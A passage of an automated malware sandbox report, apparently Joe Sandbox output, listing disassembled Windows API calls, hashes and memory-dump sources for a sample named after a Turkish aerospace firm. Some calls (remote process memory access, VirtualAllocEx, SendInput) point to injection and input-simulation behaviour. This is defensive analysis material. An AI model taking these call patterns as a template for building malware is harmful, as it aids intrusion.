                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FF983F
                                                                                                                                      • Part of subcall function 01001487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FF92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 010014B1
                                                                                                                                      • Part of subcall function 010013DE: GetWindowThreadProcessId.USER32(?,?), ref: 01001409
                                                                                                                                      • Part of subcall function 010013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 01001419
                                                                                                                                      • Part of subcall function 010013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FF925A,00000034,?,?,00001004,00000000,00000000), ref: 0100142F
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98AC
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FF98F9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                    • Opcode ID: 077dd7753ef405c330def0cf8a7cfad91a2fab9f47272ec323797bb042e95116
                                                                                                                                    • Instruction ID: e03f45c20a9a14169e61223093c9d8a3a2b49bfc1c679bde5464645b049767f8
                                                                                                                                    • Opcode Fuzzy Hash: 077dd7753ef405c330def0cf8a7cfad91a2fab9f47272ec323797bb042e95116
                                                                                                                                    • Instruction Fuzzy Hash: AF415175D0011DAFDB21DFA4CC85EDEBB78EF09340F104059EA95B7190DA71AE45DBA0
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0102F910,00000000,?,?,?,?), ref: 010279DF
                                                                                                                                    • GetWindowLongW.USER32 ref: 010279FC
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01027A0C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long
                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                    • Opcode ID: 6bc9bed276708f0da4b652904ebf9cb2a89a5feda0a20b2dd2012acde7cba245
                                                                                                                                    • Instruction ID: 5854e28144877a7c73762753186045031b9f01cbc4f615cc7ac071c34f5191c7
                                                                                                                                    • Opcode Fuzzy Hash: 6bc9bed276708f0da4b652904ebf9cb2a89a5feda0a20b2dd2012acde7cba245
                                                                                                                                    • Instruction Fuzzy Hash: E431FE71200216ABEB618E38CC01BEB7BA9FB59334F204719F9B5A22E0D735E8508B50
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01027461
                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01027475
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01027499
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                    • Opcode ID: 589c8323e2f402848bb38913f7c9ab2666a13af545bc3ff711b71b187d47476a
                                                                                                                                    • Instruction ID: 263666db36516daf477a0c3fe2b1d5260b4ebe678a9126329e832b65f63f10bb
                                                                                                                                    • Opcode Fuzzy Hash: 589c8323e2f402848bb38913f7c9ab2666a13af545bc3ff711b71b187d47476a
                                                                                                                                    • Instruction Fuzzy Hash: A421A332500229ABDF268E64CC45FEA3BB9FF48724F110154FE956B1D0DB75A851DBA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01027C4A
                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01027C58
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01027C5F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                    • Opcode ID: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                                                                                    • Instruction ID: d51fd40abb26563977aeea93914d013071f42468182f93707a77890499ce0bdf
                                                                                                                                    • Opcode Fuzzy Hash: e25211ee5b4a7e7cc27a9484e2e8d7bd12171fbbcce8be5a94be98fd84de4ec5
                                                                                                                                    • Instruction Fuzzy Hash: A82181B5600119AFEB21DF28DCC1DA737EDEF5A394B540059FA819B351CB36EC118BA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01026D3B
                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01026D4B
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01026D70
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                    • String ID: Listbox
                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                    • Opcode ID: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                                                                                    • Instruction ID: eb9da11f1dc0f71398f338c068e8fcbf963351acfb768fa69867e60adb7eec0b
                                                                                                                                    • Opcode Fuzzy Hash: ed7afdf0eafab88629d20c75a5e4bfbf4e24ff4fe92bcd55077bbbba540d121b
                                                                                                                                    • Instruction Fuzzy Hash: 6521B332600128BFDF229F58DC44FBB3BBAEB89750F118128F9859B191C6729C5187A0
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01027772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01027787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01027794
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4B83,?), ref: 00FA4C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4C56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,01021039), ref: 01020DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01020E07
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4BD0,?,00FA4DEF,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4C23
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,01018CF4,?,0102F910), ref: 010190EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01019100
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CharLowerBuffW.USER32(?,?), ref: 0101E0BE
• CharLowerBuffW.USER32(?,?), ref: 0101E101
  • Part of subcall function 0101D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0101E301
• _memmove.LIBCMT ref: 0101E314
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 010180C3
• CoUninitialize.OLE32 ref: 010180CE
  • Part of subcall function 00FFD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
• VariantInit.OLEAUT32(?), ref: 010180D9
• VariantClear.OLEAUT32(?), ref: 010183AA
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
• Instruction ID: 636f1d1d8a74bc13468f014af4767e2d9206f75167215ca2bbd0e27857cf1261
• Opcode Fuzzy Hash: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
• Instruction Fuzzy Hash: 68A169752047019FDB50DF54C881B6AB7E4BF8A354F48845DFA969B3A1CB78EE04CB82
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF76EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7702
• CLSIDFromProgID.OLE32(?,?,00000000,0102FB80,000000FF,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7727
• _memcmp.LIBCMT ref: 00FF7748
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
• Instruction ID: 962e0c32296557c41c534b5dc2288577ec22e2d98fc629899a2c084164a0622d
• Opcode Fuzzy Hash: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
• Instruction Fuzzy Hash: 0181FE75900209EFCB04DFA4C984DEEB7B9FF89315F244558E505EB260DB71AE05DB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
• Instruction ID: d857bd3db42298a20ad0b0e7a462307d019170df689a162411b4d47fc0bc5e43
• Opcode Fuzzy Hash: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
• Instruction Fuzzy Hash: 5551D375B0430ADADB24AF65D891B3EB3E5AF45310F20C81FE696DB2A1DF78D841A710
APIs
• GetWindowRect.USER32(011FEBD8,?), ref: 01029863
• ScreenToClient.USER32(00000002,00000002), ref: 01029896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01029903
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
• Instruction ID: 053e7130836c370abaf3f0ff2082af8a8f0cd308cce23a6317b3524aae207b9d
• Opcode Fuzzy Hash: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
• Instruction Fuzzy Hash: 6E518274A00229EFCF21CF6CC884AAE7BF5FF45364F148199F8959B291D771A981CB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FF9AD2
• __itow.LIBCMT ref: 00FF9B03
  • Part of subcall function 00FF9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FF9DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FF9B6C
• __itow.LIBCMT ref: 00FF9BC3
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
• Instruction ID: 7bebb116de7114108ed9ee0e2e49ba93f267805cd3db362cc90ed52fe2af9474
• Opcode Fuzzy Hash: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
• Instruction Fuzzy Hash: 0B417070A0420DABDF21EF54DC45FFE7BB9EF89760F000059BA05662A1DBB49A44DBA1
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 010169D1
• WSAGetLastError.WSOCK32(00000000), ref: 010169E1
  • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
  • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01016A45
• WSAGetLastError.WSOCK32(00000000), ref: 01016A51
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
• Instruction ID: 4c96861e6ca6a6b9eaccb3beebe3b0876a689cb9eb61e7098c91be7d6b401e32
• Opcode Fuzzy Hash: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
• Instruction Fuzzy Hash: 5E41A2B57402006FEB60AF24CC86F7A77E49F05B54F44806CFA599B2C2DAF99D019B91
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0102F910), ref: 010164A7
• _strlen.LIBCMT ref: 010164D9
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
• Instruction ID: bc751d0a623a5ef5aeafce9de95f406746a7251dd97f8705b9092f2f0653c787
• Opcode Fuzzy Hash: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
• Instruction Fuzzy Hash: 1E410671600105ABCB10EBA8DC85FFEB7F8AF05310F048159F95A9B296DF78AD04DB50
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0100B89E
• GetLastError.KERNEL32(?,00000000), ref: 0100B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0100B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0100B915
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010288DE
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 0102AB60
• GetWindowRect.USER32(?,?), ref: 0102ABD6
• PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
• MessageBeep.USER32(00000000), ref: 0102AC57
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01000B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 01000B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 01000BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 01000BFB
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
